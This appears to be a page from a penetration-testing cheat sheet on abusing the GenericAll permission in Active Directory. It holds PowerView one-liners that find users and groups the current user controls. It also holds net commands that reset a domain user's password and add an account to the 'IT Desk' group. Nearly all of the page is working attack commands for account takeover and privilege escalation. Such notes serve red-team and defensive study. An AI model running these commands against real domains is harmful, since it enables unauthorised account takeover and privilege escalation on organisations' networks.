GenericAll

GenericAll in Users

Find domain users that current user has GenericAll access right to:

powerPowerView3 > Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} ? {$_.ActiveDirectoryRights -like "*GenericAll*"}

The attacker can change password of discovered users:

Cmd > net user snovvcrash Passw0rd! /domain

GenericAll on Groups

Find domain groups that current user has GenericAll access right to:

PowerView3 > Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} ? {$_.ActiveDirectoryRights -like "*GenericAll*"}

The attacker can add users to discovered groups:

Cmd > net group "IT Desk" snovvcrash /add /domain

PreviousACL Abuse NextWrite Property

Last updated 2 years ago